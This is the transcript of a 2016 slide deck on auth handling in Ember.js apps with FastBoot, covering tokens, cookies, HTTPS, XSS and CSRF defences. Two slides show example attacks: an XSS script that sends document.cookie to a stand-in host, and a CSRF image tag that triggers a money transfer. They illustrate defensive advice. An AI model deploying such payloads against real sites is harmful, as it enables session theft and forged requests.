Auth* with FastBoot

3179e6bb62dc91d29bb906ffef4fa2d4?s=47 Marco Otte-Witte
July 12, 2016
Technology
2
610

Auth* with FastBoot

An overview of handling authentication and authorization in Ember.js app and Fastboot

3179e6bb62dc91d29bb906ffef4fa2d4?s=128

Marco Otte-Witte

July 12, 2016
Tweet

More Decks by Marco Otte-Witte

See All by Marco Otte-Witte
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
0
280
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
2
200
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
1
300
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
0
88
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
3
1.1k
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
0
120
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
1
170
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
0
270
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
2
160

Other Decks in Technology

See All in Technology
A581dece94e3a97b391d3d17b10cf084?s=48 fnario
0
130
2011382f0f10050fbb5f08e80e2bd125?s=48 akuwano
0
120
9e7a653ed313b3da4b263a772bfc5026?s=48 clustervr
0
150
C82711d1ecc5cc7a4474dd9314736f33?s=48 macole
0
150
Add4ea030be9e6aa7a319fc8c1b587c6?s=48 hashhub
2
2.1k
1def12864e30f8ea1a4d3bdd67cbb124?s=48 pitan
2
740
97d180294474e9df01503148f3b11f39?s=48 lambda
0
120
098ad475722e3697ec2fba28c8654f9f?s=48 yuhta28
0
350
0aa238a274c2397214b20d6eed58939b?s=48 moomooya
0
350
C636093440dd4a8be6416e83cb980979?s=48 iselegant
13
2.4k
0d29d155ce5c5a93ed46363626da3ea7?s=48 ocise
1
1.9k
53850955f15249a1a9dc49df6113e400?s=48 line_developers
1
420

Featured

See All Featured
3d4519fd34b76fb265fc0237f3792bd4?s=48 danielanewman
1
340
48c098b6579220a67a6ba949be6e4b5a?s=48 revolveconf
197
9.5k
3d6ace9554821d552146413bcdf874f6?s=48 trishagee
15
1k
016edace78ffe826f2348d1e0c504afd?s=48 maggiecrowley
5
300
C51b39fa3c79ccb99dcb8a076bc98287?s=48 brianwarren
82
4.6k
20bfe76b3d6105641f879fe45cfc9272?s=48 bkeepers
319
53k
A60068bce2e73de3a37ca9d2dbe36092?s=48 bryan
100
11k
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
435
28k
027d1ebf66cc039a0bd3b55eeadbe75d?s=48 sachag
266
16k
B3d6434763caa0ef5dc4b792662c49f7?s=48 smashingmag
281
46k
E14f55d3f939977cecbf51b64ff6f861?s=48 keithpitt
399
20k
B47b288784fda77a94aeb234ca743c24?s=48 keavy
105
14k

Transcript

  1. Auth* with FastBoot

  2. Marco Otte-Witte @marcoow

  3. https://simplabs.com @simplabs

  4. None

  5. https://ember-workshop.simplabs.com

  6. Auth* in Ember

  7. Authentication is verifying the identify of a user

  8. Authorization is verifying permissions of an (authenticated) user

  9. in an Ember app, you cannot actually do any of

    these

  10. $E.set('isAuthenticated', true)

  11. $E.set('isAdmin', true)

  12. actual authentication and authorization happens on the API server

  13. authorization in the Ember app itself is only about presenting

    a consistent UI

  14. The Status Quo is using token based authorization

  15. the token is issued by the API server upon authentication

    and then injected into subsequent (Ember Data) requests

  16. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  17. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  18. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  19. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  20. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  21. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  22. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  23. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  24. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token> <token>

  25. None

  26. "progressive enhancement for ambitious web apps"

  27. FastBoot performs the initial render on the server, reducing the

    time until the user sees content

  28. after the JavaScript has downloaded, the Ember app takes over

  29. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  30. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  31. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  32. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  33. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  34. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  35. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token> <token>

  36. A floating session ensures a singular execution context in the

    browser as well as in FastBoot

  37. it turns out we've had the mechanism for that since

    1997

  38. http://www.discoversmithsfalls.ca/wp-content/uploads/2014/12/mm_cookie.jpg

  39. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token> <token>

  40. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token> <token>

  41. None
  42. None
  43. None

  44. there's no document.cookie in Node.js

  45. ember install ember-cookies https://github.com/simplabs/ember-cookies

  46. Demo https://github.com/marcoow/fastboot-auth-example

  47. Security Concerns

  48. everyone with access to a user's token can impersonate as

    that user

  49. Authorization: Bearer vsret63refrwtu9

  50. Authorization: Bearer vsret63refrwtu9

  51. use HTTPs so that the token is not sent as

    clear text!

  52. Authorzation: Bearer 4t4hw4et

  53. make sure your HTTPs is setup correctly

  54. HSTS, TLS 1.1/1.2, PFS, ephemeral Diffie Hellmann key exchange, etc.

  55. validate your HTTPS setup https://www.ssllabs.com/ssltest/

  56. None

  57. http://redpowerstation.co.uk/wp-content/uploads/2013/03/image.jpg https://www.python.org/m/psf/fastly.png

  58. XSS a web developer's worst nightmare

  59. someone gets to execute their (malicious) JavaScripts in the context

    of your app

  60. <h2> Hello, {{{user.name}}} </h2>

  61. <h2> Hello, <script>$.ajax('http://bad.ru?cookie=' + document.cookie)</script> </h2>

  62. use {{…}}, not {{{…}}}

  63. don't use htmlSafe on user entered content

  64. enable CSP https://github.com/rwjblue/ember-cli-content-security-policy

  65. what if JavaScript had no access to the cookie holding

    the token in the first place?

  66. An alternative approach using token based authorization via a HttpOnly

    cookie

  67. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  68. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  69. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  70. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  71. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  72. this has implications on your domain setup

  73. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.com

  74. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.com X

  75. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.com X X

  76. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.com X X X

  77. Demo https://github.com/marcoow/fastboot-auth-example/tree/cookie-based

  78. CSRF makes users initiate requests without their consent or knowledge

  79. <img src="http://bank.com/transfers-money?amount=1mio&to=attacker"/>

  80. None

  81. when using the Authorization header for authorizing API requests, CSRF

    doesn't work

  82. when using a cookie for authorizing API requests, you're vulnerable

    to CSRF attacks

  83. CSRF results in GET requests which should not modify anything

    on the API

  84. an attacker could initiate requests to the FastBoot server

  85. FastBoot only pre-renders though, does not execute actions etc.

  86. do not perform anything potentially unsafe in beforeModel, model, afterModel

    etc.

  87. do not perform anything potentially unsafe in beforeModel, model, afterModel

    etc. (you probable don't anyways)

  88. Wrapping up

  89. Use token based authorization

  90. use a cookie to transparently move authentication state and authorization

    info between the browser and FastBoot

  91. …and make sure you're safe

  92. you could implement all these things yourself…

  93. None

  94. 1.2 is going to support FastBoot out of the box

  95. Thanks

  96. http://simplabs.com @simplabs